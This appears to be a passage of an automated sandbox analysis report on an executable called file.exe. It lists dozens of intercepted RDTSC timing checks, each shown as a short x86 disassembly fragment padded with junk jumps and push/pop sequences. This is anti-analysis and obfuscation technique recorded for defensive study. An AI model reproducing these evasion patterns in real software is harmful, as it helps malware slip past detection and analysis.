                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350E61 second address: 5350E8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, di 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c jmp 00007FD648BC9AD7h 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350E8B second address: 5350E8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350E8F second address: 5350E95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340E5D second address: 5340E7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B459h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340E7A second address: 5340ED2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD648BC9AD7h 0x00000009 sub si, 585Eh 0x0000000e jmp 00007FD648BC9AD9h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD648BC9AD8h 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340ED2 second address: 5340ED8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340ED8 second address: 5340EDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340EDC second address: 5340EE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340EE0 second address: 5340EEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340EEE second address: 5340EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx esi, di 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340EF6 second address: 5340F13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD648BC9AD9h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340F13 second address: 5340F17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380814 second address: 5380818 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380818 second address: 538081E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538081E second address: 538084A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9ACEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD648BC9AD7h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538084A second address: 538087E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 pushfd 0x00000007 jmp 00007FD648C0B450h 0x0000000c sub esi, 7AA7D0B8h 0x00000012 jmp 00007FD648C0B44Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push ecx 0x00000020 pop edi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538087E second address: 5380883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380883 second address: 53808BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B44Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007FD648C0B44Ch 0x00000010 mov dx, si 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FD648C0B453h 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532010E second address: 5320113 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5320113 second address: 5320173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FD648C0B44Dh 0x0000000a adc eax, 63AD1F36h 0x00000010 jmp 00007FD648C0B451h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a jmp 00007FD648C0B44Eh 0x0000001f push eax 0x00000020 pushad 0x00000021 jmp 00007FD648C0B451h 0x00000026 push eax 0x00000027 push edx 0x00000028 call 00007FD648C0B44Eh 0x0000002d pop eax 0x0000002e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5320173 second address: 53201E5 instructions: 0x00000000 rdtsc 0x00000002 movsx ebx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FD648BC9AD8h 0x00000010 adc ax, 1B18h 0x00000015 jmp 00007FD648BC9ACBh 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007FD648BC9AD8h 0x00000021 sbb esi, 35530578h 0x00000027 jmp 00007FD648BC9ACBh 0x0000002c popfd 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 call 00007FD648BC9ACBh 0x00000038 pop esi 0x00000039 popad 0x0000003a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53201E5 second address: 532021C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B455h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+04h] 0x0000000c jmp 00007FD648C0B44Eh 0x00000011 push dword ptr [ebp+0Ch] 0x00000014 pushad 0x00000015 movzx esi, bx 0x00000018 push eax 0x00000019 push edx 0x0000001a mov di, 197Ch 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340BD3 second address: 5340BD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340BD9 second address: 5340BDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340BDD second address: 5340C01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FD648BC9AD2h 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340C01 second address: 5340C07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340C07 second address: 5340C32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9AD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c call 00007FD648BC9ACEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53407EB second address: 53407EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53407EF second address: 534080B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9AD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534080B second address: 534082F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B44Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD648C0B450h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534082F second address: 5340835 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340835 second address: 5340863 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B44Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FD648C0B450h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 movsx edx, si 0x00000017 push ecx 0x00000018 pop edx 0x00000019 popad 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53403CA second address: 53403FE instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD648BC9AD8h 0x00000008 adc al, 00000058h 0x0000000b jmp 00007FD648BC9ACBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53403FE second address: 5340404 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340404 second address: 5340421 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD648BC9AD9h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340421 second address: 534043F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD648C0B453h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534043F second address: 53404E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD648BC9ACFh 0x00000009 sub eax, 4FFFCADEh 0x0000000f jmp 00007FD648BC9AD9h 0x00000014 popfd 0x00000015 movzx esi, dx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FD648BC9AD9h 0x00000023 or cl, FFFFFFC6h 0x00000026 jmp 00007FD648BC9AD1h 0x0000002b popfd 0x0000002c pushfd 0x0000002d jmp 00007FD648BC9AD0h 0x00000032 xor esi, 1976EC68h 0x00000038 jmp 00007FD648BC9ACBh 0x0000003d popfd 0x0000003e popad 0x0000003f mov ebp, esp 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FD648BC9AD5h 0x00000048 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350215 second address: 5350265 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, 5CAD1FB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FD648C0B44Dh 0x0000000f xor si, 6376h 0x00000014 jmp 00007FD648C0B451h 0x00000019 popfd 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 call 00007FD648C0B459h 0x00000026 pop esi 0x00000027 popad 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350265 second address: 535026B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535026B second address: 535026F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535026F second address: 5350273 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380749 second address: 5380759 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD648C0B44Ch 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380759 second address: 538075D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538075D second address: 5380787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007FD648C0B457h 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380787 second address: 538078B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538078B second address: 53807A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B457h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536023B second address: 5360277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push ebx 0x00000007 jmp 00007FD648BC9ACCh 0x0000000c mov dword ptr [esp], ebp 0x0000000f pushad 0x00000010 mov ecx, 1BF0C46Dh 0x00000015 mov ebx, eax 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a pushad 0x0000001b mov edx, eax 0x0000001d jmp 00007FD648BC9ACEh 0x00000022 popad 0x00000023 mov eax, dword ptr [ebp+08h] 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360277 second address: 536027B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536027B second address: 5360281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360281 second address: 5360287 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360287 second address: 536028B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536028B second address: 53602E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax], 00000000h 0x0000000b jmp 00007FD648C0B44Ah 0x00000010 and dword ptr [eax+04h], 00000000h 0x00000014 pushad 0x00000015 movzx ecx, di 0x00000018 pushfd 0x00000019 jmp 00007FD648C0B453h 0x0000001e sbb ax, 085Eh 0x00000023 jmp 00007FD648C0B459h 0x00000028 popfd 0x00000029 popad 0x0000002a pop ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53602E3 second address: 53602E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53602E7 second address: 53602ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340612 second address: 53406AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9ACAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FD648BC9ACEh 0x00000011 or cx, 7CF8h 0x00000016 jmp 00007FD648BC9ACBh 0x0000001b popfd 0x0000001c mov ah, C2h 0x0000001e popad 0x0000001f push eax 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FD648BC9AD0h 0x00000027 xor esi, 2AE4D758h 0x0000002d jmp 00007FD648BC9ACBh 0x00000032 popfd 0x00000033 mov edi, eax 0x00000035 popad 0x00000036 xchg eax, ebp 0x00000037 pushad 0x00000038 mov ecx, 554C6607h 0x0000003d pushad 0x0000003e mov si, BA59h 0x00000042 mov ebx, eax 0x00000044 popad 0x00000045 popad 0x00000046 mov ebp, esp 0x00000048 pushad 0x00000049 jmp 00007FD648BC9ACEh 0x0000004e call 00007FD648BC9AD2h 0x00000053 push esi 0x00000054 pop edi 0x00000055 pop eax 0x00000056 popad 0x00000057 pop ebp 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53406AB second address: 53406AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53406AF second address: 53406B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53406B5 second address: 53406BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350DBC second address: 5350DC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350DC2 second address: 5350DFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B453h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FD648C0B456h 0x00000012 pop ebp 0x00000013 pushad 0x00000014 mov cl, AFh 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360021 second address: 5360027 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360027 second address: 536002D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536002D second address: 5360052 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9AD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360052 second address: 5360056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360056 second address: 536005C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536005C second address: 5360079 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B44Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ax, dx 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360079 second address: 53600E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FD648BC9AD6h 0x0000000b sbb ecx, 03D277E8h 0x00000011 jmp 00007FD648BC9ACBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c pushad 0x0000001d mov edi, esi 0x0000001f mov ax, BFD7h 0x00000023 popad 0x00000024 pop ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 mov di, 383Ah 0x0000002c pushfd 0x0000002d jmp 00007FD648BC9ACBh 0x00000032 sbb ah, FFFFFFDEh 0x00000035 jmp 00007FD648BC9AD9h 0x0000003a popfd 0x0000003b popad 0x0000003c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538001B second address: 538015D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD648C0B44Fh 0x00000009 adc esi, 0FE62ABEh 0x0000000f jmp 00007FD648C0B459h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FD648C0B450h 0x0000001b jmp 00007FD648C0B455h 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 xchg eax, ebp 0x00000025 pushad 0x00000026 mov bl, ch 0x00000028 pushfd 0x00000029 jmp 00007FD648C0B459h 0x0000002e sbb esi, 148DB106h 0x00000034 jmp 00007FD648C0B451h 0x00000039 popfd 0x0000003a popad 0x0000003b push eax 0x0000003c jmp 00007FD648C0B451h 0x00000041 xchg eax, ebp 0x00000042 jmp 00007FD648C0B44Eh 0x00000047 mov ebp, esp 0x00000049 pushad 0x0000004a jmp 00007FD648C0B44Eh 0x0000004f jmp 00007FD648C0B452h 0x00000054 popad 0x00000055 xchg eax, ecx 0x00000056 jmp 00007FD648C0B450h 0x0000005b push eax 0x0000005c jmp 00007FD648C0B44Bh 0x00000061 xchg eax, ecx 0x00000062 jmp 00007FD648C0B456h 0x00000067 mov eax, dword ptr [76FB65FCh] 0x0000006c jmp 00007FD648C0B450h 0x00000071 test eax, eax 0x00000073 push eax 0x00000074 push edx 0x00000075 pushad 0x00000076 call 00007FD648C0B459h 0x0000007b pop ecx 0x0000007c popad 0x0000007d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538015D second address: 53801DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ebx 0x00000005 mov ecx, 116B050Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d je 00007FD6BA77D2C2h 0x00000013 pushad 0x00000014 mov ecx, 44448707h 0x00000019 mov bh, cl 0x0000001b popad 0x0000001c mov ecx, eax 0x0000001e jmp 00007FD648BC9ACFh 0x00000023 xor eax, dword ptr [ebp+08h] 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FD648BC9AD5h 0x0000002d add ax, 5156h 0x00000032 jmp 00007FD648BC9AD1h 0x00000037 popfd 0x00000038 mov bx, ax 0x0000003b popad 0x0000003c and ecx, 1Fh 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007FD648BC9AD9h 0x00000046 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53801DD second address: 5380253 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 mov ebx, ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ror eax, cl 0x0000000d jmp 00007FD648C0B452h 0x00000012 leave 0x00000013 pushad 0x00000014 mov cx, 11DDh 0x00000018 mov ch, EEh 0x0000001a popad 0x0000001b retn 0004h 0x0000001e nop 0x0000001f mov esi, eax 0x00000021 lea eax, dword ptr [ebp-08h] 0x00000024 xor esi, dword ptr [00F32014h] 0x0000002a push eax 0x0000002b push eax 0x0000002c push eax 0x0000002d lea eax, dword ptr [ebp-10h] 0x00000030 push eax 0x00000031 call 00007FD64D09B65Eh 0x00000036 push FFFFFFFEh 0x00000038 jmp 00007FD648C0B455h 0x0000003d pop eax 0x0000003e pushad 0x0000003f popad 0x00000040 ret 0x00000041 nop 0x00000042 push eax 0x00000043 call 00007FD64D09B672h 0x00000048 mov edi, edi 0x0000004a jmp 00007FD648C0B454h 0x0000004f xchg eax, ebp 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007FD648C0B457h 0x00000057 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380253 second address: 5380259 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380259 second address: 538025D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538025D second address: 5380282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD648BC9AD8h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380282 second address: 5380286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380286 second address: 538028C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538028C second address: 5380292 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
